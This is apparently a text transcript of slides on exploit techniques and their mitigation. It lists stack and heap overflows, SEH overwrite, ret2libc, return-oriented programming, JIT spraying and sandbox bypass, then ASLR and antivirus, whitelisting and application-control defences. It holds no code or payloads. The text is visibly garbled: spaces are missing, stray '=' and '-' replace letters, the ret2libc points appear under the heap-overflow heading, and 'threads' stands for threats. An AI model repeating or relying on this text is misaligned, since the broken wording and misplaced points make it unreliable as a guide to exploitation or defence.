exploit techniques and mitigation
TRANSCRIPT
WhatisExploit?
Apieceofso=warethatleverageanapplica-onvulnerabilitytocauseunintendedapplica-onbehavior
ExploitsTechniques• Stackoverflow• SEHframeoverwrite• Heapoverflow• Ret2LibC• ReturnOrientedPrograming• JITSpraying• BypasstheSandboxModel
Heapoverflow
• Overwritetheallocatedbufferinternallinkedlistpointers.
• Usetheresul=ngpointerexchangetooverwriteprogramcounter.
• Changethereturnaddressonthestacktoaknownfunc=oninasharedlibrary
• Doesn’tincludeshellcode
Ret2LibC
ReturnOrientedPrograming
• FormGadgetsbycombinevariousinstruc-ons.• Gadgetperformhigh-levelac-on• i.eVirtualAlloc(),SetProcessDEPPolicy()
JITSpraying• MakeuseofthefactthatJITcompilergenerated
executablecodeatrun=me• SprayingNOPslides,XORandshellcodeintomemory
BypasstheSandboxModel
• Bypassthesecuritymechanism• Enableuntrustedapplica-onanaccessto
underlyingsystemresources.
AddressSpaceLayoutRandomiza-on
• Randomlyarrangingtheposi=onofkeydataarea(heap,stack,exec.,libraryspace).
MalwareProtec=onSolu=on
• An=-Virus:Blacklistoffilesignature.• Onlyeffec=veagainstknownthreads
• Whitelis=ngandSandboxingsolu=on• Hardtoimplement• Requireconsistentmaintenance
• Statefulapplica=oncontrol• Automatedmalwareprotec=on• ProtectfromzerodayaZack